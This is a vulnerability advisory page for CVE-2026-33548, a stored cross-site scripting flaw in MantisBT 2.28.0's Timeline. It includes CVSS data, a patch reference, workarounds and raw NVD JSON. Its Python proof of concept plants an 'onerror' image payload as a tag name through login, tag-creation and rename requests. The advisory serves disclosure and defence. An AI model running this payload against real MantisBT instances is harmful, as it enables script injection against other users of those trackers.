Security Vulnerability Report
CVE-2026-33548 CVSS 6.1 MEDIUM

Published: 2026-03-23 20:16:28
Last Modified: 2026-03-25 13:55:16

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. In version 2.28.0, improper escaping of tag names retrieved from History in Timeline (my_view_page.php) allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript, when displaying a tag that has been renamed or deleted. Version 2.28.1 contains a patch. Workarounds include editing offending History entries (using SQL) and wrapping `$this->tag_name` in a string_html_specialchars() call in IssueTagTimelineEvent::html().

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector (v3.1, primary): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Score (v4.0, secondary, from the raw record below): 8.6 HIGH
CVSS Vector (v4.0, secondary): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:mantisbt:mantisbt:2.28.0:*:*:*:*:*:*:* - VULNERABLE
MantisBT < 2.28.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-33548: Stored XSS in MantisBT Timeline
# This script demonstrates how a malicious tag name can trigger XSS.
import requests

target_url = "http://target-mantisbt"
username = "attacker"
password = "password"

session = requests.Session()
login_payload = {"username": username, "password": password}
session.post(f"{target_url}/login.php", data=login_payload)

# Step 1: Create a tag with a malicious payload
xss_payload = "<img src=x onerror=alert('CVE-2026-33548')>"
tag_data = {"name": xss_payload, "description": "Malicious Tag"}
session.post(f"{target_url}/tags_create.php", data=tag_data)
print("[+] Malicious tag created.")

# Step 2: Attach tag to an issue (e.g. ID 1) to generate history
issue_payload = {"issue_id": "1", "tag_name": xss_payload}
session.post(f"{target_url}/tag_attach.php", data=issue_payload)
print("[+] Tag attached to issue.")

# Step 3: Rename the tag to trigger the history event
rename_payload = {"tag_name": xss_payload, "new_name": "SafeTag"}
session.post(f"{target_url}/tags_update.php", data=rename_payload)
print("[+] Tag renamed. XSS payload is now in history.")

# Exploit: Victim visits my_view_page.php, the XSS triggers.
print("[+] Trigger: Victim views the Timeline page.")
```

References

Patch commit: https://github.com/mantisbt/mantisbt/commit/f32787c14d4518476fe7f05f992dbfe6eaccd815
Vendor advisory: https://github.com/mantisbt/mantisbt/security/advisories/GHSA-73vx-49mv-v8w5

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33548", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:27.687", "lastModified": "2026-03-25T13:55:15.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. In version 2.28.0, improper escaping of tag names retrieved from History in Timeline (my_view_page.php) allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript, when displaying a tag that has been renamed or deleted. Version 2.28.1 contains a patch. Workarounds include editing offending History entries (using SQL) and wrapping `$this->tag_name` in a string_html_specialchars() call in IssueTagTimelineEvent::html()."}, {"lang": "es", "value": "Mantis Bug Tracker (MantisBT) es un rastreador de problemas de código abierto. En la versión 2.28.0, un escape incorrecto de los nombres de etiquetas recuperados del Historial en la Línea de Tiempo (my_view_page.php) permite a un atacante inyectar HTML y, si la configuración de CSP lo permite, lograr la ejecución de JavaScript arbitrario, al mostrar una etiqueta que ha sido renombrada o eliminada. La versión 2.28.1 contiene un parche. 
Las soluciones incluyen editar las entradas ofensivas del Historial (usando SQL) y envolver `$this-&gt;tag_name` en una llamada a string_html_specialchars() en IssueTagTimelineEvent::html()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", 
"attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "7CD11245-68F0-43F7-A710-5347D626FFD8"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/f32787c14d4518476fe7f05f992dbfe6eaccd815", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-73vx-49mv-v8w5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}